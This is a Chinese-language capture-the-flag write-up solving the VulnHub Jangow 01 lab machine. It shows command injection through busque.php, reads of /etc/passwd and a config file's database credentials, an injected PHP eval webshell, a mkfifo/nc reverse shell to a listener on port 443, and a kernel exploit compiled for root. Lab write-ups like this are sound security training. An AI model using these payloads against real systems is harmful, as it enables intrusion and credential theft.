靶场练习No.1 Vulnhub靶场JANGOW01
VulnHub JANGOW 01 (no.1)
靶机信息
下载地址:Jangow: 1.0.1 ~ VulnHub
难度:简单
上架时间:2021年11月4日
提示信息:The secret to this box is enumeration! Inquiries [email protected]
信息收集
nmap
sudo nmap -sP 192.168.7.1/24
发现目标主机地址:192.168.7.226
端口扫描:
sudo nmap -sC -sV 192.168.7.226 -oA Jangow01
发现开放端口21与80,80为Apache httpd 2.4.18
Web渗透
访问80端口:
发现一个目录,继续访问目录
进入站点,并发现Buscar是一个php页面,并且可以传参数
经过测试发现可以执行命令,应该是命令执行漏洞了
测试反弹shell无效
读取passwd,发现一个可以远程登录的帐号jangow01
http://192.168.7.226/site/busque.php?buscar=cat%20/etc/passwd
查看用户目录下的文件,发现一个名为user.txt的文件
http://192.168.7.226/site/busque.php?buscar=ls%20-all%20/home/jangow01
看一下文件内容,拿到一段字符串d41d8cd98f00b204e9800998ecf8427e,32位的可能是md5加密之类,去试试,cmd5解出来是空密码,暂时不知道是否有用
http://192.168.7.226/site/busque.php?buscar=cat%20/home/jangow01/user.txt
目录扫描
没什么有用的信息,开目录扫描,发现wordpress目录,访问看看
gobuster dir -u http://192.168.7.226/site/ -w /usr/share/dirb/wordlists/big.txt -t 100 -x .php,.txt,.zip
测试几个页面都无法访问,回去看看目录下有什么,果然只有两个文件
http://192.168.7.226/site/busque.php?buscar=ls%20wordpress
看下配置文件内容,发现数据库帐号desafio02和密码abygurl69
http://192.168.7.226/site/busque.php?buscar=cat%20wordpress/config.php
上传木马
拿来登陆ftp试试,登陆失败,难道帐号不是这个
继续测试使用jangow01/desafio02/abygurl69三个互相组合帐号密码来测试,发现帐号是jangow01密码是abygurl69
上传个一句话木马,发现没有上传权限,回到命令执行页面尝试写个一句话木马试试
http://192.168.7.226/site/busque.php?buscar=echo%20%27%3C?php%20eval($_POST[%22haha%22]);%27%20%3E%201.php
写入后返回200,并且访问1.php也无报错
上蚁剑,翻翻找找发现在html目录下还有一个.backup文件,打开后发现有ftp的帐号和密码
反弹shell
反弹shell,发现NC 不能使用-e参数,能执行的shell都无法执行,反回set=2,不明白什么意思
想到可以使用访问式触发反弹,蚁剑中先建个文件,然后将反弹shell写入文件
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.7.3 443 >/tmp/f');?>
在写反弹shell之前做了多次反弹尝试很多端口都无法反弹,最后发现443可以反弹(尝试方法我用主机监听端口,靶机telnet主机端口测试)
反弹成功上,切换完整的交互式bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
权限提升
查看内核版本是ubuntu16.04,上exploit-db找下提权方法
uname -a
先拿个最新的试试
下载后直接用蚁剑上传,编译加执行权限
gcc 45010.c -o exp
成功提权
查看root目录下文件
拿到flag,好像又是md5,拿去解一下
又是空密码
这篇文章到这里就结束了,喜欢打靶的小伙伴可以关注"伏波路上学安全"微信公众号,或扫描下面二维码关注,我会持续更新打靶文章,让我们一起在打靶中学习进步吧.
